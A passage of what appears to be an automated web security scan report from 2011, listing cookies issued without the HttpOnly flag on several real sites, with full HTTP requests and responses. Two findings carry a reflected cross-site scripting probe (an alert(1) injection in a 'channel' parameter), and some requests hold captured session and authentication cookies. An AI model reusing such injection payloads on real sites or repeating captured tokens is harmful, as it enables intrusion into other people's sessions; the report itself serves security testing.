Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=E76869171E1A0ADDDC87DE0666682051A5ABA524C2901C7CCEF31A6788A7A438C98C00E7ABD27B50057AA9B35AF82318BE32CAAF21BCE46BA3E3E2EF6BAD7265022CF6605B0D106AF37CB15E717B49BE7FA125545B49CD98D1796358E96925E259D28F2A8CB5B16681BF5B9DE5EB533CEFC7E936BC98024D18199973772A2B0420054643FF9639F13C27CBBB80C1152B2BC7EF70BDEC6C72A6C3ED2F16912510EBC9C641BEB2DCBD2784D94A08DAC3A2CB0C92EBE86CA6DAE5A52262E83175C215F1D237D9058600C65D041AC94F24F8BD7FAFEA186A82F05284BBAB97540DA15E7C4840; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:43:57 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=1A21DC8B98A96EC21459B14B79587A583EC2F9BC37D2E75B5317EF0E65FAFEF6730683DB17DCF2BE06F0B1B98854DE5A707FC465E78510565D9EB9DAE71D857891B9157BA899B658EA734F816E3CE32760B05F6B24F34F4DF7A20D01665DF7E18DCAAC70E57C6EDF44A0197593C73CA0FAE6C559214D35FC361C5715FE43DBF19C70EBD085C78E9E5F286FC92ED8B559596ABC60CEFF4372C361E9E899AF7753D44DE2EF1A434F6907AE0EEE63371718A38CBFF23D5698B65E6F218C4AEADA2868A458441D2D6450C6DDD153EDB3A2CE7A069305EEEB72793F81C52FB84EB011536FEF0B; expires=Tue, 26-Apr-2011 21:13:49 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=62C8AFF94277E664484BBE7EC8277401DE5ADF5C5AEAF45D558739ADCD8069717EDC476F9611DA2668E59CB60B963048A7292391B9104F44FFCFB680230472EE9A68B087279430B80A9137BCF51FCBBE8CAA2B5135B21DAB33E2FF00B71448413EC9C7D9166F621CB8C527C88854A6B0E4DFD5CD34D4666CDACDA3442EF9704AA677452920C07B5940C397045601366D36704513C6FE9B69419D140474085B16735382FEB803D48FC173BBAFD3334424BF0894189520BF2901A304307E3DC9E63E08D54BB0A62CFE50A8B440B11838DBAA606EC4F2C964E593D9C23819FB20FA690F28E5; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87568


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...

14.148. http://www.actonsoftware.com/acton/bn/1091/visitor.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actonsoftware.com
Path:   /acton/bn/1091/visitor.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /acton/bn/1091/visitor.gif?ts=1303851449256&ref=http%3A//www.moxiesoft.com/tal_products/employee-spaces.aspx HTTP/1.1
Host: www.actonsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_products/products.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wp1091=UTCUDDDDDDTTKKXJ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: wp1091=UTCUDDDDDDTTKKXJ; Domain=.actonsoftware.com; Expires=Wed, 25-Apr-2012 20:57:19 GMT; Path=/
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: image/gif;charset=UTF-8
Content-Length: 43
Date: Tue, 26 Apr 2011 20:57:19 GMT

GIF89a.............!.......,...........L..;

14.149. http://www.aptm.phoenix.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:45:12 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134809332.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Set-Cookie: vid=51857023; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44049

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...

14.150. http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/HTTPHandlerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /AptiNet/HTTPHandlerServlet HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr68743%22%3balert(1)//bb61ffcaafd&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; linkplidlist=47054; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441
Content-Length: 2640

confirmpage=superfly&errpage=superfly&curpage=superfly&page=superfly&output=text%2Fhtml&disabletrackclick=Y&nextmppposition=2&igk=207229697.3%7C000000010225%7C&ordercount=0&channel=banr68743%22%3Baler
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:49:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054; Domain=.phoenix.edu; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 4935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>Univer
...[SNIP]...

14.151. http://www.aptm.phoenix.edu/AptiNet/hhs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/hhs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /AptiNet/hhs HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mppredirect=47054; aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441; linkplidlist=47054
Content-Length: 834

pid=62A1E89CCBA3FB2D&pvp_design=design105&kw=design105&kw=&channel=banr68743%22%3Balert%281%29%2F%2Fbb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:49:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054%2C14771; Domain=.phoenix.edu; Path=/
Set-Cookie: state=-X-; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:00 GMT; Path=/
Set-Cookie: plid=47054%7C14771; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:00 GMT; Path=/
Set-Cookie: vid=51922099; Domain=.phoenix.edu; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 60076

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...

14.152. http://www.bcbst.com/css/base.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /css/base.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /css/base.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bcbst.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 314
Content-Type: text/css
Last-Modified: Fri, 05 Sep 2008 20:15:02 GMT
Accept-Ranges: bytes
ETag: "027e31394fc91:12e16"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=D539845944B34AF293E6EC900CC04974; Path=/; Domain=.bcbst.com
Set-Cookie: TLTUID=D539845944B34AF293E6EC900CC04974; Path=/; Domain=.bcbst.com expires=Tue, 26-04-2021 20:25:46 GMT
Date: Tue, 26 Apr 2011 20:25:46 GMT
Set-Cookie: NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660;path=/;httponly
Cache-Control: private
Content-Length: 314

* {
   padding: 0;
   margin: 0;
}

h1, h2, h3, h4, h5, h6, p, pre, blockquote, label, ul, ol, dl, fieldset, address {
   margin: 1em 0%;
}
p {
   margin-bottom: 0.75em;
}
em, i {
}
strong, b {

...[SNIP]...

14.153. http://www.bcbst.com/css/footer.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /css/footer.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /css/footer.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bcbst.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 1806
Content-Type: text/css
Last-Modified: Mon, 15 Sep 2008 18:38:31 GMT
Accept-Ranges: bytes
ETag: "802d50406217c91:19a987"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=AF3AE7524554A5F996E41FA3B63CAB75; Path=/; Domain=.bcbst.com
Set-Cookie: TLTUID=AF3AE7524554A5F996E41FA3B63CAB75; Path=/; Domain=.bcbst.com expires=Tue, 26-04-2021 20:25:50 GMT
Date: Tue, 26 Apr 2011 20:25:49 GMT
Set-Cookie: NSC_xxx.cdctu.dpn!80=ffffffff099f1a6745525d5f4f58455e445a4a423660;path=/;httponly
Cache-Control: private
Content-Length: 1806

#ftrNav
{
clear:both;
width:760px;
margin:0 auto;
padding:0;
height:27px;
text-transform:lowercase;
text-align:center;
background-image:url(/images/2008/footer-background.png);
background-re
...[SNIP]...

14.154. http://www.bcbst.com/css/global.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /css/global.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /css/global.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bcbst.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 50612
Content-Type: text/css
Last-Modified: Thu, 10 Mar 2011 19:00:13 GMT
Accept-Ranges: bytes
ETag: "801c9f6255dfcb1:12e16"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=AFD3633742D08E3A418BF08983C24FD8; Path=/; Domain=.bcbst.com
Set-Cookie: TLTUID=AFD3633742D08E3A418BF08983C24FD8; Path=/; Domain=.bcbst.com expires=Tue, 26-04-2021 20:25:47 GMT
Date: Tue, 26 Apr 2011 20:25:47 GMT
Set-Cookie: NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660;path=/;httponly
Cache-Control: private
Content-Length: 50612

@import url(/css/lytebox.css);

/******************************
   Global 535240
******************************/
body {    margin: 0px;    font: 75% Arial, Verdana, sans-serif;line-height:150%;    color: #3
...[SNIP]...

14.155. http://www.bcbst.com/css/header.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /css/header.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /css/header.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bcbst.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 4053
Content-Type: text/css
Last-Modified: Thu, 10 Mar 2011 19:05:06 GMT
Accept-Ranges: bytes
ETag: "05d431156dfcb1:12352"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=7005EF8142C39A04A27FD58A5CC3020B; Path=/; Domain=.bcbst.com
Set-Cookie: TLTUID=7005EF8142C39A04A27FD58A5CC3020B; Path=/; Domain=.bcbst.com expires=Tue, 26-04-2021 20:25:49 GMT
Date: Tue, 26 Apr 2011 20:25:49 GMT
Set-Cookie: NSC_xxx.cdctu.dpn!80=ffffffff099f1a6445525d5f4f58455e445a4a423660;path=/;httponly
Cache-Control: private
Content-Length: 4053

#header
{
padding:11px 0 0 0;
width:760px;
margin:0 0 -5px;
clear:both;
display:block;
position:relative;
z-index:2;
}
#header .logo {
   margin-bottom:11px;

   float:left;
}

#header sma
...[SNIP]...

14.156. http://www.bcbst.com/css/lytebox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /css/lytebox.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /css/lytebox.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bcbst.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 6053
Content-Type: text/css
Last-Modified: Wed, 17 Oct 2007 16:46:23 GMT
Accept-Ranges: bytes
ETag: "80592440dd10c81:12e16"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=58D76C0947B6D0D73504FB9229260D34; Path=/; Domain=.bcbst.com
Set-Cookie: TLTUID=58D76C0947B6D0D73504FB9229260D34; Path=/; Domain=.bcbst.com expires=Tue, 26-04-2021 20:25:48 GMT
Date: Tue, 26 Apr 2011 20:25:48 GMT
Set-Cookie: NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660;path=/;httponly
Cache-Control: private
Content-Length: 6053

#lbOverlay { position: fixed; top: 0; left: 0; z-index: 99998; width: 100%; height: 500px; }
   #lbOverlay.grey { background-color: #000000; }
   #lbOverlay.red { background-color: #330000; }
   #lbOverl
...[SNIP]...

14.157. https://www.bcbst.com/accounttools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /accounttools/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounttools/ HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849539512:ss=1303849513702

Response

HTTP/1.1 302 Redirect
Date: Tue, 26 Apr 2011 20:25:50 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: Calling_URL=https://www.bcbst.com:443/accounttools/; path=/; domain=.bcbst.com;
Location: https://www.bcbst.com/secure/public/InvalidAccess.shtm


14.158. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bertelsmann.com
Path:   /bertelsmann_corp/wms41/bm/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bertelsmann_corp/wms41/bm/index.php?language=2 HTTP/1.1
Host: www.bertelsmann.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: info=@/@1920x1200

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:40:20 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.11
Set-Cookie: BERTELSMANN_CORP_BEESITE=054ecf29cc8b85f5cefba0141cab9674; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: must-revalidate, no-cache
Pragma: no-cache
P3P: CP="IDC ADM DEV PSAi OUR IND ONL COM NAV"
Last-Modified: Tue, 26 Apr 2011 22:40:20 GMT
Cache-Control: private, no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Bertelsmann - me
...[SNIP]...

14.159. http://www.bertelsmann.com/bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bertelsmann.com
Path:   /bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php?stub=all HTTP/1.1
Host: www.bertelsmann.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php?language=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:40:23 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.11
Set-Cookie: BMAG=ea6d1758b8eee5fb24cb8f4eefcff5c9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: must-revalidate
Pragma: no-cache
ETag: 56f89593639c0b8aa3c6e845af7f6aa0
Content-Length: 558
Connection: close
Content-Type: text/javascript; charset=utf-8

// Client stub for the ajax_muz_statistics PHP Class
function muz_statistic(callback) {
   mode = 'sync';
   if (callback) { mode = 'async'; }
   this.className = 'muz_statistic';
   this.dispatcher = new HTM
...[SNIP]...

14.160. http://www.bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?scope=web&mkt=en-US&FORM=MSMONY HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; _SS=SID=AB7953A0B3D04A9F997FC8B4990FFD89; _FS=mkt=en-US; _HOP=I=2&TS=1303843123

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:38:44 GMT
Connection: close
